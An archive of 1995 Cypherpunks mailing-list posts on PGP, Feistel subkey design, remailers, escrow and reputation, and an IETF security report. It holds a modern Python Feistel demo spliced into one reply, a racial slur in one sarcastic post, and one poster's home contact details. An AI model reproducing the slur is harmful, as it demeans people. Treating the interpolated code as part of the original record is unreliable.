From: mr.xxx@ce.flashnet.it (Mr.xxx@ce.flashnet.it)
Date: Wed, 20 Sep 95 17:17:40 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <9509201546595494@ci.diamond-bar.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Date: Fri, 1 Sep 1995 21:00:32 +0200
To: cypherpunks@toad.com
From: Pasquale Piombino <mr.xxx@ce.flashnet.it>

Hi all,

I am searching PGP software.

Does anyone know where I can download it?


Thanks for answers.


-+-+------------------->->--------------------------------:-Q------------
°  Pasquale Piombino                                                    |
|   Via Colombo, 35                    Email: mr.xxx@ce.flashnet.it     °
°   I-81100 CASERTA                    Phone - Fax: 0039 823 329152     |
|       ITALY                                                           °
+-+-------------8-)---------------------:-))-----------------:-o---------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David A. Wagner" <dawagner@phoenix.Princeton.EDU>
Date: Fri, 1 Sep 95 16:10:20 PDT
To: Ted_Anderson@transarc.com
Subject: Re: Cryptanalysis of S-1
In-Reply-To: <skEmR=X0BwwMM0o3Im@transarc.com>
Message-ID: <9509012308.AA17004@tucson.Princeton.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Ted_Anderson@transarc.com writes:
> Further we have a concrete design principle: the per-round sub-keys
> should not repeat.

Right.  In fact, this design principle has been known for a long time:
the earliest reference I know of is

@inproceedings{subkeys-important,
        author = {Edna K. Grossman and Bryant Tuckerman},
        title = {Analysis of a Weakened {Feistel}-like Cipher},
        booktitle = {1978 International Conference on Communications},
        pages = {46.3.1--46.3.5},
        publisher = {Alger Press Limited},
        year = {1978},
        annote = {Feistel ciphers with identical subkeys in each round
                        are very weak}
}

-------------------------------------------------------------------------------
David Wagner                                             dawagner@princeton.edu
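
The design principle discussed above (per-round subkeys should not repeat) can be seen in a toy cipher. This is an added example, not part of the original message and not the Grossman-Tuckerman analysis itself: it shows one simple consequence, that a Feistel network using the same subkey in every round has an encryption function that is its own inverse. The round function, both key schedules, the master key and the sample blocks are constructed for illustration.

```python
import hashlib

ROUNDS = 16
MASTER = b"constructed-demo-key"  # constructed sample key, not from the thread


def round_fn(half: int, subkey: bytes) -> int:
    """Toy round function on a 32-bit half: truncated SHA-256(subkey || half)."""
    digest = hashlib.sha256(subkey + half.to_bytes(4, "big")).digest()
    return int.from_bytes(digest[:4], "big")


def feistel_encrypt(block, subkeys):
    """Balanced Feistel network on a (left, right) pair of 32-bit words."""
    left, right = block
    for subkey in subkeys:
        left, right = right, left ^ round_fn(right, subkey)
    return right, left  # undo the final swap, as DES does


def feistel_decrypt(block, subkeys):
    """Decryption is the same network with the subkeys in reverse order."""
    return feistel_encrypt(block, subkeys[::-1])


def repeating_schedule(master: bytes, rounds: int = ROUNDS):
    """Weak schedule: the same subkey in every round."""
    return [master] * rounds


def distinct_schedule(master: bytes, rounds: int = ROUNDS):
    """Illustrative schedule: a different derived subkey for each round."""
    return [hashlib.sha256(master + bytes([i])).digest()[:8] for i in range(rounds)]


def sample_blocks(count: int = 32):
    """Constructed, deterministic test blocks derived from a counter."""
    blocks = []
    for i in range(count):
        d = hashlib.sha256(b"sample-block" + bytes([i])).digest()
        blocks.append((int.from_bytes(d[:4], "big"), int.from_bytes(d[4:8], "big")))
    return blocks


def schedule_has_repeats(subkeys) -> bool:
    """Design-time check for the stated principle: no subkey appears twice."""
    return len(set(subkeys)) != len(subkeys)


def encryption_is_self_inverse(subkeys) -> bool:
    """True if E(E(x)) == x for every sample block.

    When this holds, anyone who can get blocks encrypted can also get them
    decrypted without ever learning the key, because reversing a list of
    identical subkeys gives back the same list.
    """
    return all(
        feistel_encrypt(feistel_encrypt(b, subkeys), subkeys) == b
        for b in sample_blocks()
    )


if __name__ == "__main__":
    for name, schedule in (("repeating", repeating_schedule(MASTER)),
                           ("distinct", distinct_schedule(MASTER))):
        print(name,
              "repeats:", schedule_has_repeats(schedule),
              "self-inverse:", encryption_is_self_inverse(schedule))
```

Both schedules still decrypt correctly with `feistel_decrypt`; only the repeating one collapses encryption and decryption into the same operation.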



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 1 Sep 95 19:12:02 PDT
To: "Robert A. Hayden" <mfroomki@umiami.ir.miami.edu>
Subject: Re: Phil Zimmermann/Amnesty International?
Message-ID: <ac6d0b5b04021004e861@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:50 AM 9/2/95, Robert A. Hayden wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>On Fri, 1 Sep 1995, Michael Froomkin wrote:
>
>> I think he would have to be charged first.  Have I missed something?
>> PS when does the statute of limitations run out?
>
>I'm assuming that the statute of limitations has run out on most of these
>things ( I don't know CA law, except to know it's weird :-)
>What I'm concerned about, and nobody seems to have picked up on it, is
>that one of the transcripts said that he and a partner beat up a bunch of
>perps after they tried to surrender and that one of them died(!!).
>That's murder in my book, and there is no statute of limitations on
>that, even in California...

Zimmermann and which partner?

If it was Charlie Merritt, then all I can say is that I'm surprised. Kelly
Goen...now there's a possibility.

--Tim May

P.S. As the thread title--"Re: Phil Zimmermann/Amnesty
International?"--suggests, Phil Z. is the subject being discussed. Gary
Jeffers made the bizarre speculation that Amnesty International might want
to consider Phil a "prisoner of conscience" or a "political prisoner," or
somesuch. All Michael Froomkin and others of us were pointing out is that
this would be rather difficult, given that Phil has not even been charged,
let alone tried, let alone imprisoned.

How Mark Fuhrman migrated into this thread is beyond me. But, then, he
killed Ron and Nicole, planted the glove to frame the nigger he hated so
much, and was also involved in the bombing of the WTC. That he helped Phil
export PGP is thus not surprising.


---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ROBO Mixmaster Remailer <robo@c2.org>
Date: Fri, 1 Sep 95 19:36:18 PDT
To: toad.com.loki@obscura.com
Subject: Direct Socket to Remailer?
Message-ID: <199509020225.TAA29123@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


I've heard of telnetting to port 25 to send SEMI-untraceable e-mail.
The procedure, quite frankly, sounds rather complicated.

Most of my mail that I don't want traced goes through the Mixmaster
remailer network.  I'm using Winsock-compatible software via a PPP
connection.  Is it possible, for example, to tell my mailer software
to use the remailer itself, such as "remail.obscura.com" as the mail
host, rather than "mail.myISP.com"?  Will it work, at least for
sending, without having an account at "obscura.com", or whatever
remailer?  Would that be less traceable than sending it through my
ISP's mail host?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Fri, 1 Sep 95 17:50:45 PDT
To: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Subject: Re: Phil Zimmermann/Amnesty International?
In-Reply-To: <Pine.PMDF.3.91.950901183258.541098183C-100000@umiami.ir.miami.edu>
Message-ID: <Pine.ULT.3.91.950901194832.9879C-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 1 Sep 1995, Michael Froomkin wrote:

> I think he would have to be charged first.  Have I missed something?
> PS when does the statute of limitations run out?

I'm assuming that the statute of limitations has run out on most of these 
things ( I don't know CA law, except to know it's weird :-)
What I'm concerned about, and nobody seems to have picked up on it, is 
that one of the transcripts said that he and a partner beat up a bunch of 
perps after they tried to surrender and that one of them died(!!).  
That's murder in my book, and there is no statute of limitations on
that, even in California...

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.2

iQCVAwUBMEeOOzokqlyVGmCFAQHB1gP/bGIG1BqSiM7Fmc1H4fEU3Osg/wwBz31T
5sjms6JX9Z5ekW/oL4I3QDnqrW5GiMfWHdJDRNhYU2cQx0+8V6V8muiah/GO/q+P
8v1Hg0nqYW0yBCROrD/S3kfjLViqCfHWo7S5/T9pjDnF3Dq8KT5tRrAKZrTQVfKL
B9ZhTLqqwXk=
=eFZv
-----END PGP SIGNATURE-----
 
____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
\  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
 \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
   \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GED/J d-- s:++>: a-- C++(++++)$ ULUO++ P+>+++ L++ !E---- W+(---) N+++ o+
K+++ w+(---) O- M+$>++ V-- PS++(+++)>$ PE++>(+)$ Y++ PGP++ t- 5+++ X++
R+++>$ tv+ b+ DI+++ D+++ G+++++>$ e++$>++++ h r-- y++**
------END GEEK CODE BLOCK------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Fri, 1 Sep 95 17:51:13 PDT
To: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Subject: Re: Phil Zimmermann/Amnesty International?
In-Reply-To: <Pine.PMDF.3.91.950901183258.541098183C-100000@umiami.ir.miami.edu>
Message-ID: <Pine.ULT.3.91.950901195055.9879D-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 1 Sep 1995, Michael Froomkin wrote:

> I think he would have to be charged first.  Have I missed something?
> PS when does the statute of limitations run out?

ARGH!  Shit.  I got my threads confused, thought this was about Fuhrman
and the OJ Circus.  It's been a long week.  Sorry folx.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.2

iQCVAwUBMEeOcjokqlyVGmCFAQGz2QP+IVwINZmPIQ14Kx4GpMJqjLNTWZba87cc
3QhQxbDQMD5CCSbqGsMyQ899jm/lUxdglBmMvjGIz85uSyg9b5gIinyfKs3lZKFd
ilICPOJ49r/C/wH2CaokuDCFtSOGLdOL2M7tpV+zNKiUtIk4vbm34T4COvnjy+g1
z3MZsDpSugY=
=M7M5
-----END PGP SIGNATURE-----
 
____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
\  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
 \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
   \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GED/J d-- s:++>: a-- C++(++++)$ ULUO++ P+>+++ L++ !E---- W+(---) N+++ o+
K+++ w+(---) O- M+$>++ V-- PS++(+++)>$ PE++>(+)$ Y++ PGP++ t- 5+++ X++
R+++>$ tv+ b+ DI+++ D+++ G+++++>$ e++$>++++ h r-- y++**
------END GEEK CODE BLOCK------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Fri, 1 Sep 95 17:58:17 PDT
To: cypherpunks@toad.com
Subject: Re: Phil Zimmermann/Amnesty International?
In-Reply-To: <Pine.PMDF.3.91.950901183258.541098183C-100000@umiami.ir.miami.edu>
Message-ID: <9509020057.AA17337@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



I think that two Amnesty policies are being confused. Amnesty does protest on
behalf of prisoners of conscience in all countries. It also has a rule which means
that a group making a protest should come from outside the country concerned,
this is a sensible means of preventing Amnesty becoming a vehicle for partisan
protests. They have similar rules for when they send observers etc.

I don't think that Phil necessarily has to be arrested though. Amnesty might well 
wish to send someone to the trial to act as an observer.

		Phill



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pasquale Piombino <mr.xxx@ce.flashnet.it>
Date: Fri, 1 Sep 95 12:00:27 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199509011900.VAA01399@ns.ce.flashnet.it>
MIME-Version: 1.0
Content-Type: text/plain


Hi all,

I am searching PGP software.

Does anyone know where I can download it?


Thanks for answers.


-+-+------------------->->--------------------------------:-Q------------
  Pasquale Piombino                                                    |
|   Via Colombo, 35                    Email: mr.xxx@ce.flashnet.it     
   I-81100 CASERTA                    Phone - Fax: 0039 823 329152     |
|       ITALY                                                           
+-+-------------8-)---------------------:-))-----------------:-o---------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: todd@lgt.com (Todd Glassey, Chief Technologist, Looking Glass Technologies)
Date: Fri, 1 Sep 95 22:07:18 PDT
To: cypherpunks@toad.com
Subject: FSTC - Request for Info
Message-ID: <v02110105ac6d964ae3a2@[204.156.156.4]>
MIME-Version: 1.0
Content-Type: text/plain


Hi all,
 I am now looking for pointers into this mystical consortium of financial
wizards... Also do any of you know about online issues pertaining to new
network adaptations of Unisys's proprietary banking protocols or the
FEDLINE stuff?


TIA
Todd

Regards,

T. S. Glassey
Chief Technologist
Looking Glass Technologies
todd@lgt.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 1 Sep 95 21:44:22 PDT
To: CYPHERPUNKS@toad.com
Subject: Cyphernomicon, and a section on Escrow and Reputations
Message-ID: <ac6d2ced00021004ee17@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



I've been asked by two people in e-mail what the "Cyphernomicon" I referred
to in a recent message is. It's been a while since I mentioned it, so I'll
give some details.

In late 1993 I foolishly committed to doing a "Cypherpunks FAQ," as several
earlier attempts had gone nowhere. And since the most frequently asked
question of all is always "Where's the FAQ?," followed closely by "How come
there isn't a FAQ?," the need was there. (As it turns out, the people most
in need of a FAQ seldom read FAQs, but this is another story.)

I finished my first release, a megabyte-sized file done in MORE, a powerful
outline processor (which enabled me to maintain notes, make
cross-references, and generally manage such a huge writing project). I
released it last year, and put it in my anonymous ftp account at
ftp.netcom.com, in the directory /pub/tc/tcmay, as the file CP-FAQ. Netcom
is often very crowded, though.

I know of a couple of alternative places. A very nice job of HTMLizing it
was done by Jonathan Rochkind, a Cypherpunk, and is located at the URL

http://www.oberlin.edu/~brchkind/cyphernomicon/

Another URL, which is just one large file, is

http://www.swiss.ai.mit.edu/6095/articles/cyphernomicon/CP-FAQ


The recent thread about the dangers of anonymity and the role of escrow
agents as possible fixes is a good excuse to include one of my
sub-sub-subsections, to also illustrate the structure and expected
contents.

Enjoy it. But, please, don't nag me with suggestions that I should do, or
should have done, the thing in HTML, or using your favorite tool set.

--Tim May


Crypto Anarchy:
Escrow Agents and Reputations



  16.24.1. Escrow Agents as a way to deal with contract reneging
           - On-line clearing has the possible danger implicit in all
              trades that Alice will hand over the money, Bob will verify
              that it has cleared into his account (in older terms, Bob
              would await word that his Swiss bank account has just been
              credited), and then Bob will fail to complete his end of
              the bargain. If the transaction is truly anonymous, over
              computer lines, then of course Bob just hangs up his modem
              and the connection is broken. This situation is as old as
              time, and has always involved protocols in which trust,
              repeat business, etc., are factors. Or escrow agents.
           - Long before the "key escrow" of Clipper, true escrow was
              planned. Escrow as in escrow agents. Or bonding agents.
           - Alice and Bob want to conduct a transaction. Neither trusts
              the other; indeed, they are unknown to each other. In steps
              "Esther's Escrow Service." She is _also untraceable_, but has
              established a digitally-signed presence and a good
              reputation for fairness. Her business is in being an escrow
              agent, like a bonding agency, not in "burning" either
              party. (The math of this is interesting: as long as the
              profits to be gained from any small set of transactions are
              less than her "reputation capital," it is in her interest
              to forego the profits from burning and be honest. It is
              also possible to arrange that Esther cannot profit from
              burning either Alice or Bob or both of them, e.g., by
              suitably encrypting the escrowed stuff.)
           - Alice can put her part of the transaction into escrow with
              Esther, Bob can do the same, and then Esther can release
              the items to the parties when conditions are met, when both
              parties agree, when adjudication of some sort occurs, etc.
              (There are a dozen issues here, of course, about how disputes
              are settled, about how parties satisfy themselves that
              Esther has the items she says she has, etc.)
  16.24.2. Use of escrow services as a substitute for government
           + as in underworld deals, international deals, etc.
             - "Machinery of Freedom" (Friedman), "The Enterprise of
                Law" (Benson)
           - "It is important to note in any case that the use of third-
              party escrow as a substitute for Government regulation was
              a feature of the Northern European semi-anarchies of
              Iceland and Ireland that have informed modern libertarian
              thought." [Duncan Frissell, 1994-08-30]
  16.24.3. Several people have raised the issue of someone in an
            anonymous transaction simply taking the money and not
            performing the service (or the flip side). This is where
            _intermediaries_ come into the picture, just as in the real
            world (bonds, escrow agents, etc.).
  16.24.4. Alice and Bob wish to conduct an anonymous transaction; each
            is unknown to the other (no physical knowledge, no pseudonym
            reputation knowledge). These "mutually suspicious agents," in
            1960s- and 70s-era computer science lingo, must arrange
            methods to conduct business while not trusting the other.
  16.24.5. Various cryptographic protocols have been developed for such
            things as "bit commitment" (useful in playing poker over the
            phone, for example). I don't know of progress made at the
            granularity of anonymous transactions, though. (Though the
            cryptographic protocol building blocks at lower levels--such
            as bit commitment and blobs--will presumably be used
            eventually at higher levels, in markets.)
  16.24.6. I believe there is evidence we can shorten the cycle by
            borrowing noncryptographic protocols (heresy to purists!) and
            adapting them. Reputations, for example. And escrow agents (a
            form of reputation, in that the "value" of a bonding entity
            or escrow agent lies in reputation capital).
  16.24.7. if a single escrow agent is suspected of being untrustworthy
            (in a reputation capital sense), then can use _multiple_
            escrows
           - with various protocols, caveat emptor
           - n-out-of-m voting schemes, where n escrow agents out of m
              are required to complete a transaction
           - hard to compromise them all, especially if they have no
              idea whether they are being "legitimately bribed" or merely
              pinged by a reputation-rating service
           - Hunch: the work of Chaum, Bos, and the Pfitzmanns on DC-
              nets may be directly applicable here...issues of collusion,
              sets of colluders, detection of collusion, etc.




---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: don@cs.byu.edu
Date: Fri, 1 Sep 95 21:58:01 PDT
To: cypherpunks@toad.com
Subject: Re: SSL attack
Message-ID: <199509020358.VAA00340@wero>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

From: "Robert A. Rosenberg" <hal9001@panix.com>

>I thought that the ACK gives starting location and number of segments. If I
>get 500 segments and ACK at the 50% point I am sending an ACK for the
>Starting Point and 250 Segments (the unprocessed part would then ACK

With multiple hierarchical servers, you don't have the same bottleneck
problems. If you have a random mode that you can switch into, same deal
(if you care to use it). There are a lot of people who want the anonymity
and server-independence of random mode. There are people who don't want
to add another 37% onto the processing time, given the unlikeliness of
a D.O.S. attack on the server. I continue to support the idea of a 
two-pronged attack using both methods.

Given that most of the server bottleneck was un-updated clients anyway,
I think that the bottleneck-on-the-server problem is solved anyway, 
meaning there won't be any problems getting new keys - thus eliminating
the need for a keyspace buffer queue.

Don

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMEfVssLa+QKZS485AQEV9QMAoue7RyySe1H0a7s6hBkjf7knaXesLY1h
ZQg9rBZ9ZieJ5qWyBHL03Gn4XikSD8U6/MBbiyMvOnz+QTYRQcMxQioEu4YDcFdD
etaful6wYhtXzd/MTn+VWjBf86poDeNK
=Mp2o
-----END PGP SIGNATURE-----
<don@cs.byu.edu>           fRee cRyPTo!   jOin the hUnt or BE tHe PrEY
PGP key - http://bert.cs.byu.edu/~don     or PubKey servers (0x994b8f39)
  June 7&14, 1995: 1st amendment repealed.  Death threats ALWAYS pgp signed
* This user insured by the Smith, Wesson, & Zimmermann insurance company *




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 1 Sep 95 20:02:30 PDT
To: cypherpunks@toad.com
Subject: IETF security report
Message-ID: <9509020301.AA17722@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>From saag-request@neptune.tis.com Fri Sep  1 19:09:55 1995
Received: from TIS.COM (neptune.tis.com [192.94.214.96]) by postman.osf.org (8.6.9/8.6.x) with SMTP
	id TAA08164 for <rsalz@osf.org>; Fri, 1 Sep 1995 19:09:54 -0400
Received: from neptune.tis.com by neptune.TIS.COM id aa06599; 1 Sep 95 16:20 EDT
Received: from relay.tis.com by neptune.TIS.COM id aa06595; 1 Sep 95 16:18 EDT
Received: from big-screw.mit.edu(18.72.0.176) by relay.tis.com via smap (g3.0.1)
	id xma004617; Fri, 1 Sep 95 16:07:54 -0400
Received: by big-screw 
	id AA23873; Fri, 1 Sep 95 16:18:03 -0400
Date: Fri, 1 Sep 95 16:18:03 -0400
Message-Id: <9509012018.AA23873@big-screw>
>From: "Jeffrey I. Schiller" <jis@mit.edu>
Sender: jis@mit.edu
To: minutes@cnri.reston.va.us
Subject: IETF Security Area Report (July 17-21, 1995: 33rd IETF meeting)
Cc: secdir@TIS.COM, saag@TIS.COM
Status: R

-----BEGIN PGP SIGNED MESSAGE-----

                       IETF Security Area Report
                      Jeff Schiller and Jim Galvin
                              jis@mit.edu
                             galvin@tis.com

                            July 17-21, 1995

The Security  Area  within the  IETF is responsible  for  development of
security oriented protocols,  security  review of RFCs,  development  of
candidate policies, and review of operational security on the Internet.

The Area Director is assisted by a Directorate,  an advisory entity with
no standards-setting powers.   The  members of the Security  Directorate
are as follows.

        Jeffrey I. Schiller <jis@mit.edu>
        Ran Atkinson <atkinson@itd.nrl.navy.mil>
        Steve Bellovin <smb@research.att.com>
        Steve Crocker <crocker@tis.com>
        Barbara Fraser <byf@cert.org>
        James M. Galvin <galvin@tis.com>
        Phil Karn <karn@qualcomm.com>
        Steve Kent <kent@bbn.com>
        John Linn <linn@ov.com>
        Clifford Neuman <bcn@isi.edu>
        Rob Shirey <shirey@mitre.org>
        Ted Ts'o <tytso@mit.edu>

In addition to  the  Directorate the  Security  Area is assisted by  the
Security  Area  Advisory Group (SAAG).  The  SAAG  is an open group that
meets at  least once during each IETF  meeting as well as electronically
via the   saag@tis.com mailing list.    Send  a message  to  the address
saag-request@tis.com to join the list.

During the  Security Area Advisory Group  (SAAG) meeting, the activities
of the Security  Area,   including  the Directorate, are    reported and
discussed.  In addition, the   SAAG meeting provides an  opportunity for
open discussion of security issues.

Included below is a  summary from those working  groups  and birds of  a
feather  sessions  with security relevant activities  to  report and the
Security Directorate meeting summary.  In addition, the following topics
were discussed during the SAAG meeting.

o Documents Approved as Proposed Standards

  The  IESG approved the  advancement of five  of the IPSEC documents to
  proposed standards.  With the advancement of these documents the IPSEC
  working group will focus on issues related to key management.

  The  IESG approved   the  advancement of  the  two  MOSS  documents to
  proposed standards.  With the  advancement of these documents  the PEM
  working group has completed its charter and will be closed.

o Domain Name System Security

  The last revision of the enhancements for the  DNS to support security
  has been  released.  It will enter  working group last call very soon;
  no issues are expected to be raised.  At  the end of the working group
  last call the document will be submitted to  the IESG to be considered
  for publication  as a Proposed  Standard.   An implementation  of  the
  specification is available to U.S.  and Canadian sites and individuals
  via anonymous      FTP (see   ftp://ftp.tis.com/pub/DNSSEC/README  for
  details).

o Key Management

  It was noted that the Internet needs two kinds  of key management: one
  for short-term keys and one for long-term keys.  The expected usage of
  short-term keys would be  on a  per connection  or per message  basis.
  Long-term keys, on the other hand, would probably be used to exchange
  short-term keys.

  The  distribution and management    of  long-term keys   requires  the
  existence of a  global infrastructure.  There are  two options for the
  global infrastructure today: Secure DNS or  The Directory (X.500).  It
  is  also possible that something   completely different will be needed
  and developed.

  Key management is expected to get increasing attention in the IETF.

o Internet Security Architecture

  Steve Crocker  gave an abbreviated version of  his presentation to the
  IAB the previous  evening.  He posed  a challenge to the community  to
  improve the network security at  IETF meetings.  The specific proposal
  is  to have IPSEC available with  manual keying, which would be enough
  to make a difference when compared to the current configuration.  This
  should be  available for use in   the IETF terminal  room  by both the
  terminals/workstations and laptops.  In addition,  we should install a
  demonstration firewall that is IPSEC friendly.  The goal is to make it
  available at the next IETF meeting in Dallas (December 4-8, 1995).

The  activity  of the following working  groups  and  birds of a feather
sessions was reported.

o Secure Socket Layer (SSL) BOF

  A consensus   developed  for the   need for  a session layer  security
  protocol.  This was predicated on   observing that IPSEC is below  the
  transport  layer and  the   session  layer is    above  it,  and  that
  implementing security in the transport or  network layer would require
  changes to  operating systems.   In  contrast, session  layer security
  could be  implemented and added   non-invasively to existing  systems,
  thus making  security   services  available to     a broad range    of
  application protocols.

  As a result, a working  group called Session   Layer Security will  be
  proposed.  The Secure  Socket Layer  specification  will serve as  the
  starting point for the new working group.

o Internet Secure Payments Protocol (ISPP) BOF

  This  BOF    met  two times with     more   than a   dozen  technology
  presentations.  Fortunately, the  various technologies  are much  more
  similar than they are different.

  The consensus was that the IETF should have one or more working groups
  in this  area.   Charters will be  proposed and  submitted to the area
  director for consideration.

o Simple Key Management for IP (SKIP) BOF

  SKIP is  Sun's proposal for  key management on  the Internet.  It is a
  competitor to the   Photuris specification being discussed  in IPSEC.
  It is  still  undecided as  to  whether  this specification should  be
  discussed as part of the IPSEC working group or within its own working
  group.

  Although there appeared to be consensus to move the SKIP specification
  onto the standards track, the authors will need to discuss the process
  and relationship to IPSEC with the area director and the Chairs of the
  IPSEC working group before this can be done.

  [Note: Since  the  IETF  meeting took  place  discussions  between the
   various parties are proceeding.  The  likely outcome will be for  the
   SKIP work to take place within the IPSEC working group.]

o Authenticated Firewall Traversal (AFT)

  There  are     currently    four    implementations   underway    with
  interoperability testing expected to begin shortly.  If the testing is
  successful three  documents   will be submitted   to  the IESG to   be
  considered for publication as Proposed  Standards before the next IETF
  meeting in Dallas.

o Common Authentication Technology (CAT)

  The CAT  working group discussed  topics related to  active documents,
  including GSS-V2 (to receive another set  of specific revisions at the
  Internet-Draft  level, and then  to be  recommended for advancement to
  Proposed Standards),  IDUP (where revised interface specifications and
  a   new    mechanism specification   were   discussed,  with standards
  advancement to be considered at the  Dallas IETF), GSS-API Negotiation
  (new  draft discussed), Kerberos mechanism  and extensions (status and
  comments  discussed,  new  drafts  to follow),  FTP   Security (to  be
  recommended  for advancement to Proposed   Standard after inclusion of
  clarifying revisions), and a presentation of a  new mechanism based on
  FIPS PUB JJJ cryptography.  Presentations on work in progress included
  GSS-API integration into World-Wide Web browsers and servers, loadable
  GSS-API multi-mechanism support, and discussion of the use of RFC-1731
  as   a   generic framework for   integration  of  security tokens into
  text-based  applications.    The  group  also  discussed   a range  of
  candidate  follow-on  topic   areas related  to   authorization,   and
  identified a  subset  with apparent common  value and  feasibility for
  proposals and work by group members.

o Web Transaction Security (WTS)

  There were three short presentations on related  subjects and a review
  of  the two  documents  being developed by  the  working  group.  With
  respect to  the requirements  specification,  several new  issues were
  raised at this  meeting and most, but  not all, were  resolved.  There
  was consensus to  resolve the remaining  issues  on the  list and then
  submit the document to the IESG to be considered for publication as an
  information RFC.

  Recent changes  to the SHTTP document were  reviewed and no objections
  were  raised.  An outstanding issue   is coordinating SHTTP with MOSS,
  which is dependent  on the harder  (and outside our scope) problem  of
  coordinating HTTP with  MIME.  We  remain hopeful  that we will  reach
  consensus on a document to propose to  advance to Proposed Standard by
  the next IETF meeting in Dallas.

o IP Security (IPSEC)

  The   interoperability  testing  of   the  recently  approved Proposed
  Standards  was discussed.  The majority  of the meeting was devoted to
  discussing Internet key management  and  the two working documents  on
  Photuris and ISAKMP.

o Site Security Handbook (SSH)

  Two documents are   expected to  be available  by  the  first week  of
  November,  which will allow for  final revisions to be proposed during
  the  next IETF meeting in Dallas  followed  by advancing the documents
  onto the standards track as quickly as possible.

The Security Area   Directorate met on Monday   afternoon for a 2   hour
meeting.  In addition to all of the above, the following was noted.

o Intellectual Property Rights (IPR)

  The    purpose of the discussion was    information exchange.  Several
  protocols are pending in the IESG as a result of unresolved IPR issues
  and several protocols from the security area are about to be submitted
  to the IESG with unresolved IPR  issues.  It is uncertain exactly what
  the outcome will be of any specific case.

o Key-ed MD5

  Key-ed MD5 is being used in a variety of protocols for authentication.
  The IETF needs an applicability statement which includes advice on how
  often to change the secrets.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Fri, 1 Sep 95 23:33:08 PDT
To: cypherpunks@toad.com
Subject: Re: Direct Socket to Remailer?
Message-ID: <ac6da5d1010210040573@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:25 PM 9/1/95, ROBO Mixmaster Remailer wrote:
>I've heard of telnetting to port 25 to send SEMI-untraceable e-mail.
>The procedure, quite frankly, sounds rather complicated.
>
>Most of my mail that I don't want traced goes through the Mixmaster
>remailer network.  I'm using Winsock-compatible software via a PPP
>connection.  Is it possible, for example, to tell my mailer software
>to use the remailer itself, such as "remail.obscura.com" as the mail
>host, rather than "mail.myISP.com"?  Will it work, at least for
>sending, without having an account at "obscura.com", or whatever
>remailer?  Would that be less traceable than sending it through my
>ISP's mail host?

I don't think it would provide much more security, but it might keep your
ISP from logging the mail. If you are using mixmaster@remail.obscura.com as
your remailer, you are welcome to use it as the mail host for that mail.
It is a slow connection so please do not use it as your regular mail host.

You should try the telnet port 25 trick. It is amazingly simple (but not
secure). Just "telnet some.machine.com 25" and type help. It will guide you
through it. It is quite informative.

        -Lance

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
